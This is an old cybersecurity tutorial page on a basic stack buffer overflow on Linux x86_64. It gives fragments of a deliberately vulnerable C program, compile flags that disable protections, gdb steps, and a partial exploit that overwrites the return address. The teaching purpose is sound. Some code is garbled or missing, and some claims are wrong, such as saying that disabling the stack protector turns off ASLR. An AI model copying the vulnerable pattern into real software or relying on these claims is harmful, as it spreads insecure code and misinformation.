Tutorial: Basic Buffer Overflow

September 1, 2015 | Views: 4284

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

// Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.
// So, let’s start with a basic example in C:
// First some standard includes, you should now them…

// we create a vulnerable function
int vulnFunction(int a, int b)
// it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!
char Buffer1[125];

// now we get some input that could be greater than the buffer

// and a pointer to the buffer will be returned
return strdup(Buffer1);

int main()

// This will never be called…
void Unused()
Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack
-zexecstack is to change the read & write mode of the stack to executable
-fno-stack-protector is for simplicity; it disables the randomization of the stack
(called address space layout randomization = ASLR)

Q: So, what happens if we give an input greater than the buffer?
A: It overrides everything from the beginning of the buffer until buffer begins + length of input;

Let’s try it out:
perl -e ‘print “A”x220 | ./first_vuln #to much input…
Yeah it crashes….
Now we start gdb to find some values:
gdb -q ./first_vuln
Disassemble the Unused function to get its start address
disas Unused

Now, you should search for something like this
Dump of assembler code for function Unused:
0x000000000040061c : push %rbp // this will be the new return address…

The stack is built like this:
rbp register

Ok, we have our info. We need 128bytes for the buffer and 8 for the rbp register. After that, the rip begins.
We need to overwrite the complete buffer and the rbp register and append a new return address…


int main(char *argv[])
int i = 0;
for (i=0;i<34;i++)

unsigned RIP = 0x000000000040061c;//0x000000000040061c;

return 0;

Simply compile the exploit and run it like this:
./first_exploit | ./first_vuln


Have fun, and maybe you should read some more tutorials on buffer overflows.




Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
1 Comment
  1. in this example you are just redirecting executing flow to the hacked print function right?

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?